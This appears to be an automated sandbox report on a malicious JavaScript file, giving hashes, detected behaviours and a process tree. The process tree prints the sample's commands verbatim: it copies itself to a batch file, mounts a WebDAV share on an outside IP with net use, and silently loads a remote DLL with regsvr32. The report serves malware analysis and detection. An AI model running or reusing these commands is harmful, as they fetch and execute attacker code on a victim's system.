Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10/07/2024, 01:31
Static task
static1
Behavioral task
behavioral1
Sample
513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f.js
Resource
win10v2004-20240709-en
General
-
Target
513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f.js
-
Size
5KB
-
MD5
17e532cf832f426f7873080a8fde7b80
-
SHA1
57adfe6064c9adb6812514a70e7bb7a64410f658
-
SHA256
513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f
-
SHA512
d5bbf8ac0f72ec4c57914dd53df3a9ab0f1855b99ec238a5fffb93a8f374983e5a567fa9ee9b14a99e5bc9fbc513560d3e9b2a5b7ec406ed890a5417e38610e5
-
SSDEEP
96:5pPiPwp0al1+6NBJphDJph8cIy6MIGfYogk0PxbNG2PZZBZk1Bk:5pTl3bJpxJpdp6MRA77k0
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 5076 wrote to memory of 1428 5076 wscript.exe 82 PID 5076 wrote to memory of 1428 5076 wscript.exe 82 PID 1428 wrote to memory of 2568 1428 cmd.exe 85 PID 1428 wrote to memory of 2568 1428 cmd.exe 85 PID 1428 wrote to memory of 2416 1428 cmd.exe 87 PID 1428 wrote to memory of 2416 1428 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f.js" "C:\Users\Admin\\mxwavp.bat" && "C:\Users\Admin\\mxwavp.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2568
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\424.dll3⤵PID:2416
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD517e532cf832f426f7873080a8fde7b80
SHA157adfe6064c9adb6812514a70e7bb7a64410f658
SHA256513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f
SHA512d5bbf8ac0f72ec4c57914dd53df3a9ab0f1855b99ec238a5fffb93a8f374983e5a567fa9ee9b14a99e5bc9fbc513560d3e9b2a5b7ec406ed890a5417e38610e5